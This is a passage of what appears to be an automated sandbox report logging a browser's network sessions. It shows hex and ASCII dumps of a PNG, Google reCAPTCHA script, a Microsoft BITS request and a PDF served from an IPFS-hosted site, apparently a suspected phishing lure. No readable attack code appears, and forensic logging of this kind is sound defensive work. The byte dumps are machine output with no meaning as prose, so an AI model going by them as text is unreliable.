                                              2024-09-27 06:17:59 UTC361INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 6e 58 44 32 41 4d 30 56 64 64 53 50 6b 36 75 4b 41 7a 4e 7a 7a 66 4e 68 76 51 58 25 32 46 41 59 71 4b 50 35 77 58 48 6b 25 32 46 25 32 46 6f 53 4d 61 35 34 54 25 32 42 37 79 63 25 32 46 64 59 41 52 65 74 42 37 55 51 71 76 33 68 7a 75 32 45 4d 57 35 59 4b 53 38 47 78 7a 47 58 35 44 6e 41 77 5a 65 41 59 41 48 44 43 65 45 73 55 6f 7a 6d 6b 55 44 6e 47 6d 76 6d 72 42 5a 73 25 32 46 56 4e 33 41 30 64 54 41 38 6f 44 35 47 63 4e 6e 76 43 75 34 39 63 36 55 25 32 46 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d
                                              Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nXD2AM0VddSPk6uKAzNzzfNhvQX%2FAYqKP5wXHk%2F%2FoSMa54T%2B7yc%2FdYARetB7UQqv3hzu2EMW5YKS8GxzGX5DnAwZeAYAHDCeEsUozmkUDnGmvmrBZs%2FVN3A0dTA8oD5GcNnvCu49c6U%2F"}],"group":"cf-nel","m
                                              2024-09-27 06:17:59 UTC1218INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 fb 00 00 00 fb 08 06 00 00 00 ac 72 e2 a6 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 07 74 49 4d 45 07 e8 05 0a 03 1b 35 6c 5d ed bb 00 00 80 00 49 44 41 54 78 da ed bd 77 80 26 c7 59 e7 ff ad ee 7e df 77 f2 cc ee ce e6 9c b4 5a e5 9c 6c d9 96 6d 59 38 cb 11 30 e0 73 38 c0 07 f8 0e 64 0b 87 3b 7e 17 7c 9c 0f 8e e3 38 83 0f 0e 30 9c 8d 09 8e 80 0d c6 d8 18 47 70 94 2c 2b 6b 15 56 9b e3 cc 4e 9e 37 74 d7 f3 fb a3 2b 3c 55 dd fd be ef cc 86 69 99 29 e9 dd 79 df 0e d5 95 3e f5 84 0a 2d b0 34 41 2c d1 73 97
                                              Data Ascii: PNGIHDRrgAMAa cHRMz&u0`:pQ<bKGDtIME5l]IDATxw&Y~wZlmY80s8d;~|80Gp,+kVN7t+<Ui)y>-4A,s
                                              2024-09-27 06:17:59 UTC1369INData Raw: cb 61 81 61 29 60 cf b3 d7 b5 0a 5f 05 50 ed ab 55 87 7f 6c e7 e6 97 0c 56 a2 d5 06 27 0e bd 00 62 02 ea 89 44 4b 4a b4 24 b9 9f 84 d0 a2 f4 23 02 81 88 b1 49 06 7a 40 0a a0 2e a5 b9 d6 ff c4 50 7f 49 22 0c 04 13 45 0b 87 3e 05 ff 87 19 7a b2 43 90 f0 dd ec 02 f1 c4 38 e2 d3 27 83 0d d7 df 72 c9 9e ab ae 5a 79 f8 f0 e1 fb 9f 4e 25 7c 5e 6e 3a 15 e6 72 58 44 b8 90 93 6a 8a 2a 35 03 3f 11 42 62 32 42 ab 85 fa 7b 20 02 9c 9a 3c 83 87 0e ec 47 7f b5 86 20 47 4a c7 52 62 a6 d5 c2 55 bb 77 63 fd d0 20 48 92 62 93 0c 9b 84 00 df 7f f2 49 34 e6 66 d1 5f ab e6 26 51 4a 89 79 29 71 fd de bd 18 aa 54 bc 39 63 c2 78 de b3 d0 e7 79 f3 35 d8 7a 6e 8e 30 a3 02 7a 44 41 88 9c e8 a9 f8 f7 52 85 3c 11 9c 17 ec 04 a2 00 f5 7d 8f 20 fc fa 97 c2 4b 5e 72 e7 6b ef be fb 6e 01
                                              Data Ascii: aa)`_PUlV'bDKJ$#Iz@.PI"E>zC8'rZyN%|^n:rXDj*5?Bb2B{ <G GJRbUwc HbI4f_&QJy)qT9cxy5zn0zDAR<} K^rkn
                                              2024-09-27 06:17:59 UTC1369INData Raw: b8 86 5e cb 5a 10 93 d4 02 90 44 98 9a 99 c5 d0 e0 30 fa 2b 11 48 c6 e9 b5 06 4c 60 2e 89 71 e8 cc 19 90 ee 3c 14 30 42 39 ea d6 af 1a 45 2c 13 d4 e7 1b a6 63 11 ce ca 6b ab d6 0b 90 81 9e 14 f4 50 69 21 35 79 e7 42 4a 7a ed cc 73 34 17 73 35 96 48 d2 fb 29 66 e9 51 7f 27 1f 79 10 54 af 23 52 c0 0b 21 50 a9 54 2a bb 76 ed 7a fd 5d 77 dd f5 8b d7 5e 7b ed 3a e4 03 6f 47 6e 96 55 fa ae c2 52 c1 4e 5d 9f 25 b2 2a b2 b4 13 6b 98 a3 1a 20 42 ab d5 c2 5c 63 1e 1b 56 8f 42 48 a9 ec 78 e5 bd 27 02 82 00 47 27 27 70 cf 53 4f 60 3e 49 58 93 50 9d 85 24 0c 54 aa 58 39 32 82 e9 99 69 35 11 c7 4d 93 e3 1d 27 0b bd c8 83 5e 3b 02 4d a7 00 64 a1 97 e7 0c 7a 51 02 e8 f5 aa c2 4e d5 aa ff 8a 20 c0 fc b1 23 98 3b 7c 00 b5 5a 0d 41 10 20 0c 43 04 41 80 6a b5 5a d9 bd 7b f7
                                              Data Ascii: ^ZD0+HL`.q<0B9E,ckPi!5yBJzs4s5H)fQ'yT#R!PT*vz]w^{:oGnURN]%*k B\cVBHx'G''pSO`>IXP$TX92i5M'^;MdzQN #;|ZA CAjZ{
                                              2024-09-27 06:17:59 UTC1369INData Raw: 8b 83 9e 16 00 7d 56 d2 b7 19 b2 3b 2b e8 45 57 d0 9b ec 7b d0 77 59 a1 a6 5e 58 34 e6 77 f3 cc 18 e2 b9 39 3d 4f de f9 54 2a 95 0c f0 3d 3d 3d bd 57 5d 75 d5 1b 7f f9 97 7f f9 67 b6 6d db b6 1a cb c0 77 0c 65 d9 bc c2 d9 70 b2 b7 5a 1d 7a fd b6 0d b7 0f 55 c3 51 7b 87 6d c0 41 10 60 6c 6e 16 8f 9d 38 86 8b 37 6d c5 86 c1 21 48 99 28 95 d2 3e 2a 10 c0 d6 55 ab b0 77 e3 06 6c 5f bb 06 db d7 ae 41 4f 6f 2f 0e 1e 3b 86 be de 3e 84 41 88 b1 c9 49 ac 5b b5 0a 15 be 1d b5 fa db 53 ab e1 d8 d4 24 4e 4d 4d e2 a2 4d 9b d1 13 e8 1d 71 74 33 d5 af 71 13 f6 b1 7a 03 8a 1c 48 2e fc 36 d8 fa 1a 9d 20 91 4d 14 fb de 6e ef 7b 27 5a 2f 6a a7 9f 61 d1 3a fd 1e c1 4c 26 d2 2b 16 a5 f9 0d 48 11 60 ed 0d 37 a3 77 c5 4a a3 95 a5 cf 74 ff f2 10 45 51 65 74 74 f4 d2 9d 3b 77 86
                                              Data Ascii: }V;+EW{wY^X4w9=OT*===W]ugmwepZzUQ{mA`ln87m!H(>*Uwl_AOo/;>AI[S$NMMMqt3qzH.6 Mn{'Z/ja:L&+H`7wJtEQett;w
                                              2024-09-27 06:17:59 UTC1369INData Raw: b1 63 07 ee bb ef be c7 66 66 66 f2 80 17 c8 2d f1 dc ef cf f8 50 96 37 c2 e4 04 d7 8b 9c 0b bd 1e 9a 0b d2 8b 84 52 25 29 03 bd 76 a6 09 13 97 59 7f 6d cc 5e d6 c8 b5 5a aa 01 04 8c 16 61 a1 b7 bb a6 3a 92 1f ac e3 11 be 7a 2f 00 0a d4 e9 2c f4 a4 b7 be d2 d0 fb 7d 88 29 0b 7b ef 6c a3 81 f1 44 62 cb 6b df 80 1d af 7c 1d aa 83 83 69 be a4 5d c2 db 18 3b 8d 27 ff ea e3 38 fe b9 bf 42 4f 14 a1 bf 9a be ea ca 78 fd f9 73 b8 23 4f e5 83 84 73 02 5e ef e0 26 12 da 91 67 47 15 9c 2b 4d 07 63 cb 5b bf 92 2b 99 9f 73 c6 d8 81 74 55 9c 94 d2 74 00 0b 09 bd bd bd fd d7 5f 7f fd 5b de f3 9e f7 e0 fd ef 7f ff 87 8e 1d 3b 76 ba a0 a1 fd 8b 78 f3 4c 49 25 7b 65 e8 f5 5b ac cd 9e 7a c0 c1 a4 37 75 29 e9 d5 79 41 06 90 62 49 af ef 15 d9 24 ab 1b ed 9a fa a5 97 f4 40 6a
                                              Data Ascii: cfff-P7R%)vYm^Za:z/,}){lDbk|i];'8BOxs#Os^&gG+Mc[+stUt_[;vxLI%{e[z7u)yAbI$@j
                                              2024-09-27 06:17:59 UTC148INData Raw: 1b fe ad ef 7d ef 7b df b2 61 c3 86 85 02 6f 92 71 de 1a ff 39 0e a5 85 dd c2 c0 e6 57 9f 0d f4 da f1 83 7c e8 49 7a c0 95 05 7a c0 48 7a 41 16 f8 84 24 82 5a 0f a2 de 5e 53 66 b2 d5 02 35 9b d0 28 eb 72 8c 25 61 fc 91 87 31 71 df 3d a8 46 91 85 9d cc 2e f7 b9 d0 0b be 5f bd 92 f4 f6 25 96 ac 58 a4 dd 4d 48 cf ee cb f5 6c 39 1a 40 7a 33 9f 5a d3 29 9c 2d f0 79 fb d2 2b 1b fe ad ef 79 cf 7b 16 0a fc 33 ce 86 2f 2d ec d9 90 85 5e 76 82 9e dd
                                              Data Ascii: }{aoq9W|IzzHzA$Z^Sf5(r%a1q=F._%XMHl9@z3Z)-y+y{3/-^v
                                              2024-09-27 06:17:59 UTC1369INData Raw: 6b fe 9c 6b e8 f9 80 f4 82 a0 4f ef 59 b0 a4 d7 cf 97 12 22 8a 10 56 aa 36 97 ad 26 90 b4 a0 67 f5 11 08 31 49 4c b5 62 f4 5d 7e 0d 92 a1 15 68 c6 b1 89 d7 ac 94 33 d0 c3 81 1e 22 1f 7a 5d 7e a6 33 65 26 97 15 cc 5c 95 77 8a ce 96 3f 34 f0 64 70 e9 e0 ce 3b a7 c0 eb 0f b7 e1 7f 98 25 7c b9 61 e7 d2 9c 1d 6c 0b 3d 41 11 2b dd d6 67 3d 72 8b 87 5e c2 8e 41 6b c7 99 19 ee d3 71 fa d0 a7 ef 9d b3 63 80 dc 7c e0 0d 76 01 d0 eb e3 42 40 f8 d3 48 39 58 44 88 93 18 71 b5 8a dd 6f 78 23 fa b6 6c 45 a2 c6 b2 9d 8f d0 53 8d 51 08 3d fb 61 ca 91 6c 01 c2 76 8a cc e1 99 d3 df da 8d 44 ec 18 bb e0 89 ee 62 d8 ee 7c 48 78 3d 2c f7 ee 77 bf 7b 31 12 1e 39 df 4b 17 ca 0b 3b 53 f3 ac 93 cd b7 01 3b 40 0f 06 19 ce 01 f4 7c 98 c8 99 54 62 d5 5c 17 7a 99 51 f5 f9 47 18 bf 15
                                              Data Ascii: kkOY"V6&g1ILb]~h3"z]~3e&\w?4dp;%|al=A+g=r^Akqc|vB@H9XDqox#lESQ=alvDb|Hx=,w{19K;S;@|Tb\zQG
                                              2024-09-27 06:17:59 UTC1369INData Raw: d0 b3 a8 8c 4d af a5 9d 56 cf 35 47 ca 96 17 7a e7 1c 63 8a e8 6b 89 69 28 1d a0 37 7f 2c f4 42 04 48 1a 75 c4 f3 f3 a8 0e 0d a7 f7 04 01 aa 23 2b 31 47 a9 bd 9b 24 31 50 eb 45 65 64 45 a6 b9 69 37 a2 1e 43 6f 07 3d 37 79 ec 84 5d 6e c3 a7 d7 6b 7f 89 ef 3c b5 33 f3 dc 8f dd a1 da 96 83 de a6 3b 10 a9 27 4c 0a 42 28 54 fa 44 00 08 09 21 05 f4 9c 42 69 5e 50 29 d8 be 77 7a 78 96 0d d3 9a 0e 20 95 fc 94 24 90 33 d3 98 9c 9a c4 99 a7 1e c7 13 5f fe 07 d4 56 ae c2 ea 8b f6 60 cb d5 d7 61 d3 65 57 60 68 cd 5a 48 02 c2 30 1c 54 e3 f0 f2 7d ef 7b df 87 4e 9c 38 31 ce 32 c8 3d 92 3e f0 3a 94 02 f8 52 c3 ce 6d 6a 0b 3d 3c 49 0f 66 22 da 32 75 84 b2 76 88 e9 23 8b 81 9e 3b f0 58 b0 26 ac 30 36 3c 77 1e 1a 15 d7 81 3e bd be 6b e8 01 af 33 23 04 10 90 cd 26 e2 86 dd
                                              Data Ascii: MV5Gzcki(7,BHu#+1G$1PEedEi7Co=7y]nk<3;'LB(TD!Bi^P)wzx $3_V`aeW`hZH0T}{N812=>:Rmj=<If"2uv#;X&06<w>k3#&
                                              2024-09-27 06:17:59 UTC1369INData Raw: 3a 72 a5 37 7f 03 8e 4d b6 60 71 ea 4e 4f d7 4d e0 db f8 a9 da 96 7a e9 95 34 d7 9f 40 bd 46 3b 95 e4 42 39 e8 2c e0 ba 33 b5 c3 7e fa 3b 5f 76 23 1c 13 c3 74 0e 6c 28 cf c4 4b e9 de 41 32 08 20 65 82 83 5f fa 3c 56 9f 19 bb e2 8e 9b 6f fa d9 27 9f 7c ea 57 ef bb f7 9e 83 48 79 f2 a5 7b 9e 93 6e 49 a4 7b 69 61 37 ea 14 2c d8 99 20 8a a1 07 5c f5 5e db aa c4 ec 75 c7 b6 e4 c7 08 b9 1d 81 73 31 c1 3e 69 a1 d0 b3 e9 bc 20 17 7a 11 f0 16 c2 a6 0a 7b d0 0b 21 10 02 a8 1f 3f 92 4a ed 50 cd a2 8b 22 0c 6c dd 81 83 df fd 26 46 d6 6d 40 6d 68 24 7d 56 92 a4 f9 27 30 f3 00 ae 74 16 aa c4 89 77 3c ec 5a d5 21 38 2f bc e0 76 3c bb 9a 40 8e 79 6f 5a b8 99 26 ab 3c ef 64 7d 14 7a d3 0d 01 20 01 d2 91 36 22 24 64 5f 5c 19 80 52 1b dd 78 d4 c1 bc ec de 5f 07 66 57 92 9b
                                              Data Ascii: :r7M`qNOMz4@F;B9,3~;_v#tl(KA2 e_<Vo'|WHy{nI{ia7, \^us1>i z{!?JP"l&Fm@mh$}V'0tw<Z!8/v<@yoZ&<d}z 6"$d_\Rx_fW


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.449744142.250.184.1964433104C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:17:59 UTC451OUTGET /recaptcha/api.js HTTP/1.1
                                              Host: www.google.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-09-27 06:17:59 UTC749INHTTP/1.1 200 OK
                                              Content-Type: text/javascript; charset=utf-8
                                              Expires: Fri, 27 Sep 2024 06:17:59 GMT
                                              Date: Fri, 27 Sep 2024 06:17:59 GMT
                                              Cache-Control: private, max-age=300
                                              Cross-Origin-Resource-Policy: cross-origin
                                              Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                              Server: ESF
                                              X-XSS-Protection: 0
                                              X-Frame-Options: SAMEORIGIN
                                              X-Content-Type-Options: nosniff
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Accept-Ranges: none
                                              Vary: Accept-Encoding
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              2024-09-27 06:17:59 UTC641INData Raw: 35 39 61 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67
                                              Data Ascii: 59a/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.g
                                              2024-09-27 06:17:59 UTC800INData Raw: 41 41 43 51 65 79 4a 76 63 6d 6c 6e 61 57 34 69 4f 69 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 64 76 62 32 64 73 5a 53 35 6a 62 32 30 36 4e 44 51 7a 49 69 77 69 5a 6d 56 68 64 48 56 79 5a 53 49 36 49 6b 52 70 63 32 46 69 62 47 56 55 61 47 6c 79 5a 46 42 68 63 6e 52 35 55 33 52 76 63 6d 46 6e 5a 56 42 68 63 6e 52 70 64 47 6c 76 62 6d 6c 75 5a 7a 49 69 4c 43 4a 6c 65 48 42 70 63 6e 6b 69 4f 6a 45 33 4e 44 49 7a 4e 44 49 7a 4f 54 6b 73 49 6d 6c 7a 55 33 56 69 5a 47 39 74 59 57 6c 75 49 6a 70 30 63 6e 56 6c 4c 43 4a 70 63 31 52 6f 61 58 4a 6b 55 47 46 79 64 48 6b 69 4f 6e 52 79 64 57 56 39 27 3b 69 66 28 76 26 26 76 2e 63 6f 6f 6b 69 65 44 65 70 72 65 63 61 74 69 6f 6e 4c 61 62 65 6c 29 7b 76 2e 63 6f 6f 6b 69 65 44 65 70 72 65 63 61 74 69 6f 6e 4c 61 62 65 6c 2e
                                              Data Ascii: AACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.
                                              2024-09-27 06:17:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.449747184.28.90.27443
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:18:01 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept: */*
                                              Accept-Encoding: identity
                                              User-Agent: Microsoft BITS/7.8
                                              Host: fs.microsoft.com
                                              2024-09-27 06:18:01 UTC466INHTTP/1.1 200 OK
                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                              Content-Type: application/octet-stream
                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                              Server: ECAcc (lpl/EF67)
                                              X-CID: 11
                                              X-Ms-ApiVersion: Distribute 1.2
                                              X-Ms-Region: prod-weu-z1
                                              Cache-Control: public, max-age=37693
                                              Date: Fri, 27 Sep 2024 06:18:01 GMT
                                              Connection: close
                                              X-CID: 2


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.449751104.26.13.1414433104C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:18:02 UTC343OUTGET /1.pdf HTTP/1.1
                                              Host: pdf-online.on-fleek.app
                                              Connection: keep-alive
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: navigate
                                              Sec-Fetch-Dest: empty
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-09-27 06:18:02 UTC1166INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:18:02 GMT
                                              Content-Type: application/pdf
                                              Content-Length: 175997
                                              Connection: close
                                              CF-Ray: 8c995fc41d9e43dd-EWR
                                              CF-Cache-Status: HIT
                                              Accept-Ranges: bytes
                                              Access-Control-Allow-Origin: *
                                              Age: 87738
                                              Cache-Control: max-age=60, stale-while-revalidate=3600
                                              ETag: "bafkreibgqepz7ttrxvsod4rf4qnvagd6bl6ehvex4edau4nazblwaysqde"
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                              access-control-allow-headers: Content-Type, Range, User-Agent, X-Requested-With
                                              access-control-allow-methods: GET,HEAD,OPTIONS
                                              access-control-expose-headers: Content-Length, Content-Range, X-Chunked-Output, X-Ipfs-Path, X-Ipfs-Roots, X-Stream-Output
                                              access-control-max-age: 86400
                                              content-security-policy: upgrade-insecure-requests
                                              referrer-policy: strict-origin-when-cross-origin
                                              x-cache-status: HIT
                                              x-content-type-options: nosniff
                                              x-ipfs-path: /ipfs/bafybeifmbu2ttwabti5xp77ys3x23v6qdkud5ndbcn2piidi4mucrajf7m/1.pdf/
                                              x-ipfs-roots: bafybeifmbu2ttwabti5xp77ys3x23v6qdkud5ndbcn2piidi4mucrajf7m,bafkreibgqepz7ttrxvsod4rf4qnvagd6bl6ehvex4edau4nazblwaysqde
                                              x-request-id: c275482a4dbc935c545e5fea377bf199
                                              x-xss-protection: 0
                                              2024-09-27 06:18:02 UTC355INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 6d 57 71 51 6f 31 50 41 70 63 4b 25 32 46 51 67 56 62 38 4f 36 7a 56 4e 50 70 32 36 44 49 6d 75 75 52 46 49 6d 53 25 32 46 61 66 53 7a 32 6d 63 69 42 4a 6b 36 53 71 71 75 6b 48 47 38 36 4e 6e 45 4d 35 35 41 33 50 64 4b 54 52 6e 44 56 59 75 36 4b 77 6c 43 49 77 30 32 55 42 4c 4a 4d 6e 59 6b 62 63 4f 6f 52 47 4b 55 54 72 34 25 32 42 70 39 52 38 32 72 45 4c 63 6d 55 45 72 51 41 52 45 70 25 32 42 4d 69 4f 53 34 59 70 48 61 34 30 6a 53 4e 41 65 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65
                                              Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mWqQo1PApcK%2FQgVb8O6zVNPp26DImuuRFImS%2FafSz2mciBJk6SqqukHG86NnEM55A3PdKTRnDVYu6KwlCIw02UBLJMnYkbcOoRGKUTr4%2Bp9R82rELcmUErQAREp%2BMiOS4YpHa40jSNAe"}],"group":"cf-nel","max_age
                                              2024-09-27 06:18:02 UTC1217INData Raw: 25 50 44 46 2d 31 2e 37 0d 0a 25 b5 b5 b5 b5 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 32 20 30 20 52 2f 4c 61 6e 67 28 65 6e 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 33 32 20 30 20 52 2f 4d 61 72 6b 49 6e 66 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e 3e 2f 4d 65 74 61 64 61 74 61 20 31 33 33 20 30 20 52 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e 63 65 73 20 31 33 34 20 30 20 52 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 32 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 73 2f 43 6f 75 6e 74 20 32 2f 4b 69 64 73 5b 20 33 20 30 20 52 20 32 37 20 30 20 52 5d 20 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 33 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 2f 50 61 72 65 6e
                                              Data Ascii: %PDF-1.7%1 0 obj<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 32 0 R/MarkInfo<</Marked true>>/Metadata 133 0 R/ViewerPreferences 134 0 R>>endobj2 0 obj<</Type/Pages/Count 2/Kids[ 3 0 R 27 0 R] >>endobj3 0 obj<</Type/Page/Paren
                                              2024-09-27 06:18:02 UTC1369INData Raw: 26 8a a8 6c 0b f7 74 ba f8 42 ce 67 9b e9 3c 94 c1 03 b8 cb 75 4b a5 86 a3 77 2d ad 54 12 c5 e6 41 df 58 db f6 f2 9e 42 cf 3e 20 35 8d 63 62 12 83 76 c0 a8 8a d3 2f 24 e1 ee 87 fe e1 94 87 74 38 e3 a1 06 a0 21 a2 30 51 9d 80 31 b5 35 48 46 45 2a 2a 3b 52 0a aa 3a 45 09 80 53 d4 61 ea 0a a4 8d a6 4c e6 24 27 11 8d e0 01 af 06 f1 4e 0d ea 99 2b 57 21 ae 69 62 ea be 99 a3 b2 1b 15 51 93 27 45 99 f2 84 47 2a 58 80 e6 7c 79 e5 51 9b 17 e3 8c 12 ca 01 b4 8d d4 e5 0e 1a 62 10 7b 15 83 80 35 34 55 8a 4e 30 9f ba 29 be 96 f8 f5 0c 42 41 c1 6c c8 e5 14 fb 8f b3 d1 25 c4 c1 b2 b4 72 d0 33 40 42 72 af 12 62 10 ca b7 10 d0 12 f3 d5 f1 c5 03 91 93 ab 36 31 03 a4 a3 f6 29 1d 1d db 34 b9 42 d1 5b c8 cd 4f 41 46 3a b8 24 97 68 51 56 40 e3 0b 04 72 08 10 48 1b ff 00 89 e8
                                              Data Ascii: &ltBg<uKw-TAXB> 5cbv/$t8!0Q15HFE**;R:ESaL$'N+W!ibQ'EG*X|yQb{54UN0)BAl%r3@Brb61)4B[OAF:$hQV@rH
                                              2024-09-27 06:18:02 UTC1369INData Raw: 87 13 ca d7 ca 49 59 8c 72 61 78 3e 60 f3 28 e8 18 68 18 6c 0c d5 6f 5f 36 b0 bb f7 94 54 0f 15 29 ab a9 65 8c fa 6d d5 92 51 c3 86 65 35 c2 17 ca c7 52 4f 03 c1 80 fb e3 39 3a 49 0e 2d 96 ae 48 64 3f 76 21 92 10 f3 58 68 08 68 24 d8 50 76 b8 80 cb 1a 72 f4 00 a6 04 c3 fd ba 36 e9 db d4 e2 50 92 6a ee af c5 d3 e1 9e 5a bc 9c a3 ab 16 ef 9c aa 52 21 6b de 53 8b 67 02 b3 34 57 c4 55 05 00 4f 9a 78 98 ea 87 d0 f9 70 37 db 15 32 90 ed 06 25 05 50 81 a8 43 36 dd f8 32 d9 94 f8 ec 68 03 5f 01 94 e3 73 0a 70 18 94 f3 26 89 2f 39 1c e9 14 46 c4 8a aa 6d 2f 70 48 df be e6 76 77 9c fd 44 61 ed 56 33 ad 4b 34 67 74 09 1b c7 45 9f 5d b1 82 2b d2 b1 0b eb 10 51 f8 f2 c9 ed d6 a7 1e 37 93 f4 1a 30 1e 9b d6 3d cc 7f 07 10 e4 4b 18 b7 21 c8 34 09 12 54 32 17 41 bb dd fe
                                              Data Ascii: IYrax>`(hlo_6T)emQe5RO9:I-Hd?v!Xhh$Pvr6PjZR!kSg4WUOxp72%PC62h_sp&/9Fm/pHvwDaV3K4gtE]+Q70=K!4T2A
